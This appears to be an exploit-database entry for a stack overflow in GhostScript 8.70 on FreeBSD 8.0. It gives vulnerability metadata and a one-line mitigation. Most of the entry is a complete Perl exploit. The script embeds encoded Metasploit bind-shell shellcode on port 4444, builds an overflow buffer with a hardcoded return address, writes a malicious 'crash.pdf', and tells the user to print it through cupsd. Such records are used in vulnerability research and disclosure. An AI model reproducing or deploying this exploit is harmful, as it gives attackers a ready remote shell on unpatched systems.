Vendor: GhostScript
By: Rodrigo Rubira Branco
CVSS: 7.8 (HIGH)
Vulnerability: Stack Overflow (CWE-119)
Product Name: GhostScript
Affected Version From: 8.70
Affected Version To: 8.70
Patch Exists: YES
Related CWE: N/A
CPE: a:artifex:ghostscript:8.70
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD 8.0
2010

Check Point Software Technologies – Vulnerability Discovery Team (VDT) – GhostScript Stack Overflow

The Check Point Vulnerability Discovery Team (VDT) discovered a stack overflow in GhostScript 8.70 and published an exploit for it on FreeBSD 8.0. The payload is a 214-byte bsd/x86/shell_bind_tcp shellcode encoded with x86/alpha_upper. The script writes a malicious PDF built around a 1200-byte buffer, with the shellcode appended at the end of that buffer. The overflow is triggered when the PDF is opened.

Mitigation:

Update to the latest version of GhostScript.

Exploit-DB raw data:

##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>              #
#                                                                        #
# GhostScript Stack Overflow                                             #
#                                                                        #
##########################################################################

use strict;
use warnings;

# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $buf =
"\x54\x5a\xda\xd1\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43" .
"\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x50\x31\x49\x50" .
"\x46\x30\x45\x38\x4b\x4f\x44\x42\x42\x31\x51\x4c\x4d\x59" .
"\x4b\x57\x50\x50\x43\x5a\x45\x51\x42\x4a\x44\x42\x42\x4a" .
"\x44\x50\x4e\x50\x45\x31\x48\x4d\x4b\x30\x51\x47\x46\x30" .
"\x46\x30\x43\x5a\x45\x38\x51\x48\x48\x4d\x4b\x30\x4d\x59" .
"\x51\x57\x4a\x4c\x48\x30\x43\x5a\x48\x4d\x4d\x50\x4e\x50" .
"\x45\x4e\x48\x4d\x4d\x50\x50\x50\x50\x50\x43\x5a\x51\x4a" .
"\x50\x58\x48\x4d\x4d\x50\x4b\x4f\x50\x4f\x4a\x44\x43\x49" .
"\x4b\x46\x46\x30\x42\x48\x46\x4f\x46\x4f\x44\x33\x42\x48" .
"\x43\x58\x46\x4f\x43\x52\x45\x39\x42\x4e\x4b\x39\x4b\x53" .
"\x46\x30\x46\x34\x50\x53\x50\x50\x48\x30\x47\x4b\x48\x4d" .
"\x4d\x50\x41\x41";

# File body: "e!PS" prefix, filler, the address labelled as the shellcode
# address, more filler, then the shellcode padded out to 1200 bytes and
# trailed by 100 "Z" bytes. The oversized buffer is what overflows the stack.
my $pkt = "e!PS".
"A" x 500 . "00001111222233334444555556666777788889999aaa".
"\x40\xd9\xbf\xbf". # Shellcode Addr
"bccccddd".
"\xef\xbe\xbf\xbf".
"ffff".
"\xff\xbf" x 100 .
"C" x (1200 - length($buf)) . $buf . "Z" x 100;

print STDERR "Check Point Vulnerability Discovery Team (VDT)\n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!\n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)\n";

print STDERR "\nCreating evil pdf ...";

# Write the file in binary mode and fail loudly if it cannot be created.
open(my $fh, '>', 'crash.pdf') or die "Cannot open crash.pdf: $!";
binmode($fh);
print $fh $pkt;
close($fh) or die "Cannot close crash.pdf: $!";

print STDERR " d0ne!\n";
print "Now print it via cupsd!\n";